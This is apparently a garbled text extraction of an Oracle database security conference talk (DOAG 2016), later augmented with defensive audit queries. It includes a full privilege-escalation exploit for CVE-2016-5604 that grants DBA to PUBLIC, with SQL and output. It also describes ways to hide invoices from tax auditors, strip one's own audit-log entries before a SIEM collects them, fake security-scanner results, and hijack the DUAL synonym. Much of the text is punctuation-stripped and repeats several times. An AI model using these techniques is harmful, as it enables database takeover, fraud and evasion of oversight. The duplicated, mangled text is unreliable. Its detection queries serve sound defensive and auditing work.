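                  AND o.object_type IN ('TABLE', 'VIEW', 'PACKAGE'))
   AND (s.table_owner <> 'SYS' OR s.table_name <> s.synonym_name);
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name = 'DUAL'
   AND (owner, object_type) NOT IN (('SYS', 'TABLE'), ('PUBLIC', 'SYNONYM'));

-- 5. Checksums of security-relevant views: hash the current DDL and compare
--    with the baseline. A changed DBA_AUDIT_TRAIL is the scenario-2 tell-tale.
SET SERVEROUTPUT ON
DECLARE
  l_ddl  CLOB;
  l_hash VARCHAR2(64);
BEGIN
  FOR v IN (SELECT owner, view_name FROM dba_views
             WHERE owner = 'SYS'
               AND view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS', 'DBA_ROLE_PRIVS',
                                 'DBA_SYS_PRIVS', 'DBA_TAB_PRIVS')) LOOP
    l_ddl  := DBMS_METADATA.GET_DDL('VIEW', v.view_name, v.owner);
    -- HASH_SH256 exists from 12c on; on 11g use DBMS_CRYPTO.HASH_SH1
    l_hash := RAWTOHEX(DBMS_CRYPTO.HASH(l_ddl, DBMS_CRYPTO.HASH_SH256));
    DBMS_OUTPUT.PUT_LINE(RPAD(v.owner || '.' || v.view_name, 25) || l_hash);
  END LOOP;
END;
/
```

Run the script from a client that is itself outside the DBA's reach (the checksums are only meaningful if the DBA cannot also edit the baseline), and keep step 4 even on databases where nobody uses synonyms deliberately: the DUAL redirection from the Red Attack example is a one-line change that no application-level test will ever notice.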
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and auditors / security departments should be aware of powerful Oracle features which could be used to modify application logic
Audit these features even if they are not in use
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q & A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a "secret"
Secret = 'XDB'
and the hash will be MD5(XDB:tiger)
and is stored in the SPARE4 column, starting with "H:" (the H hash)
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL, and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist
==> The user does not have the privilege to access DBA_USERS.

SQL> select * from user_sys_privs;
USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO
==> The CREATE ANY LIBRARY privilege is granted to SYSMAN_APM.

SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER.
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
       PRAGMA AUTONOMOUS_TRANSACTION;
     BEGIN
       execute immediate 'grant dba to public';
       COMMIT;
       RETURN FOO;
     END;
     /
==> Grant execution privileges to PUBLIC.
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function-based index (FBI). The function GETDBA is used for the function-based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> A reconnect is necessary.
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
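From the defender's side, the walkthrough above leaves footprints in the data dictionary. The following queries are an added example, not part of the slides; they assume Oracle 12c (ORACLE_MAINTAINED columns) and a login holding SELECT_CATALOG_ROLE, and the privilege list is a starting point rather than a complete one.

```sql
-- Added review checks (not from the slides): look for the artifacts of a
-- CREATE ANY INDEX / invoker-rights escalation like the CVE-2016-5604 walkthrough.
-- Assumes Oracle 12c dictionary views and SELECT_CATALOG_ROLE.

-- 1. Roles granted to PUBLIC. Out of the box PUBLIC holds no roles at all, so
--    any row here (above all DBA, the end state of the walkthrough) is a finding.
SELECT grantee, granted_role, admin_option, default_role
  FROM dba_role_privs
 WHERE grantee = 'PUBLIC';

-- 2. Non-Oracle-maintained grantees holding "ANY" privileges of the kind
--    SYSMAN_APM had. CREATE ANY INDEX is what the index on SYSTEM.HELP needs.
SELECT p.grantee, p.privilege, p.admin_option
  FROM dba_sys_privs p
 WHERE p.privilege IN ('CREATE ANY INDEX', 'CREATE ANY LIBRARY',
                       'CREATE ANY PROCEDURE', 'CREATE ANY TRIGGER',
                       'EXECUTE ANY PROCEDURE', 'GRANT ANY ROLE',
                       'GRANT ANY PRIVILEGE')
   AND p.grantee NOT IN (SELECT username FROM dba_users
                          WHERE oracle_maintained = 'Y')
   AND p.grantee NOT IN (SELECT role FROM dba_roles
                          WHERE oracle_maintained = 'Y')
 ORDER BY p.grantee, p.privilege;

-- 3. Function-based indexes on SYS/SYSTEM tables owned by somebody else.
--    The expression (SYSMAN_APM.GETDBA('AK2') in the walkthrough) is evaluated
--    by whichever session maintains the index, including SYS sessions.
SELECT i.owner AS index_owner, i.index_name, i.table_owner, i.table_name,
       e.column_expression
  FROM dba_indexes i
  JOIN dba_ind_expressions e
    ON e.index_owner = i.owner
   AND e.index_name  = i.index_name
 WHERE i.index_type LIKE 'FUNCTION-BASED%'
   AND i.table_owner IN ('SYS', 'SYSTEM')
   AND i.owner NOT IN ('SYS', 'SYSTEM');

-- 4. Invoker-rights code (AUTHID CURRENT_USER) that PUBLIC may execute, outside
--    the Oracle-maintained schemas: the shape of GETDBA before it was triggered.
SELECT DISTINCT p.owner, p.object_name, p.object_type
  FROM dba_procedures p
  JOIN dba_tab_privs t
    ON t.owner      = p.owner
   AND t.table_name = p.object_name
 WHERE t.grantee   = 'PUBLIC'
   AND t.privilege = 'EXECUTE'
   AND p.authid    = 'CURRENT_USER'
   AND p.owner NOT IN (SELECT username FROM dba_users
                        WHERE oracle_maintained = 'Y')
 ORDER BY p.owner, p.object_name;
```

Every row returned by queries 1 and 3 should be explained by a change ticket; rows from 2 and 4 are candidates for revoking or rewriting with AUTHID DEFINER.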
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you: „Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary…“
Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC.
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem, you will just deliver the proper results.
A lot of different wishes…
but luckily we are using Oracle.
Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate the SQL statement.
Select value …
Oracle Data Redaction allows to mask / manipulate the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN, …
The DBA can decide what will be returned.
Select value …
A typical query from security checklists/scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as a man in the middle as well.
Possible approaches:
modify views (e.g. add spare != 'DBA1' to the view dba_audit_trail): all entries of the OS user DBA1 disappear from the view. If a SIEM solution retrieves the audit data through the view, the entries from DBA1 are not retrieved.
create or change synonyms to „redirect“ objects
replace a table with a view / instead-of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  -- unqualified DUAL: resolved via the public synonym, not SYS.DUAL
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;

SYS CAN INFLUENCE THE DVSYS ANALYSIS VIA A VIEW NAMED DUAL
Source: „Red Attack - Die Katastrophe in der Datenbank“ (Red Attack - the catastrophe in the database), Gunther Pipperr
… where x=y
Where conditions can be changed using VPD.
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide „certain“ invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows to replace an entire query: the user submits Query A, the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
Add a random string (e.g. aksdjhiuz) to the query to avoid the SQL Translation Framework (new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if VPD is not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
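The countermeasures above can be turned into a pre-flight script the auditor runs before trusting any result. This is an added example, not part of the DOAG slides; it assumes Oracle 12c dictionary views, a login holding SELECT_CATALOG_ROLE, and uses APP.PARAMETER / APP.INVOICES as placeholder names for the objects being audited.

```sql
-- Added auditor pre-flight checks (not from the slides). Assumes Oracle 12c and
-- SELECT_CATALOG_ROLE. APP.PARAMETER and APP.INVOICES are placeholder objects.

-- 1. Am I who I think I am, and where? A changed CURRENT_SCHEMA makes every
--    unqualified name resolve in another schema.
SELECT sys_context('USERENV', 'SESSION_USER')   AS session_user_name,
       sys_context('USERENV', 'CURRENT_SCHEMA') AS current_schema_name
  FROM sys.dual;

-- 2. DUAL must be SYS.DUAL (a table) and the public synonym must point there.
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name = 'DUAL'
   AND NOT (owner = 'SYS'    AND object_type = 'TABLE')
   AND NOT (owner = 'PUBLIC' AND object_type = 'SYNONYM');
SELECT table_owner, table_name
  FROM dba_synonyms
 WHERE owner = 'PUBLIC' AND synonym_name = 'DUAL'
   AND NOT (table_owner = 'SYS' AND table_name = 'DUAL');

-- 3. Is it really a table? Anything else standing under an expected table name
--    (view, synonym, ...) deserves a look, as does any INSTEAD OF trigger.
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE (owner, object_name) IN (('APP', 'PARAMETER'), ('APP', 'INVOICES'))
   AND object_type <> 'TABLE';
SELECT owner, trigger_name, table_owner, table_name
  FROM dba_triggers
 WHERE trigger_type = 'INSTEAD OF';

-- 4. Redaction and VPD policies that rewrite values or add where clauses.
SELECT 'REDACTION' AS kind, object_owner, object_name, policy_name,
       expression AS detail, enable
  FROM redaction_policies
UNION ALL
SELECT 'VPD', object_owner, object_name, policy_name,
       pf_owner || '.' || package || '.' || function, enable
  FROM dba_policies
 ORDER BY 1, 2, 3;

-- 5. Who is exempt from those policies: the auditor should be, nobody else.
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('EXEMPT ACCESS POLICY', 'EXEMPT REDACTION POLICY');

-- 6. SQL Translation Framework: registered translations and whether this
--    session has a translation profile switched on.
SELECT owner, profile_name, sql_text, translated_text, enabled
  FROM dba_sql_translations;
SELECT name, value
  FROM v$parameter
 WHERE name = 'sql_translation_profile';

-- 7. View checksums to compare with a baseline taken at hardening time
--    (TEXT_VC is the 12c VARCHAR2 copy of the view definition).
SELECT owner, view_name, standard_hash(text_vc, 'SHA256') AS view_sha256
  FROM dba_views
 WHERE (owner, view_name) IN (('SYS', 'DBA_AUDIT_TRAIL'), ('SYS', 'DBA_USERS'))
 ORDER BY owner, view_name;

-- 8. The random-string trick from the slide: a comment changes the statement
--    text, so a translation registered for the "known" text no longer matches.
SELECT /* aksdjhiuz */ upper(value)
  FROM app.parameter
 WHERE upper(name) = 'XYZ';
```

Run the checks in a fresh session and keep the output with the audit evidence; a non-empty result from checks 2 to 6 means the environment, not just the data, has to be explained before any value is accepted.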
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and Auditors/Security Departments should be aware of powerful Oracle features which could be used to modify application logic.
Audit these features even if they are not in use.
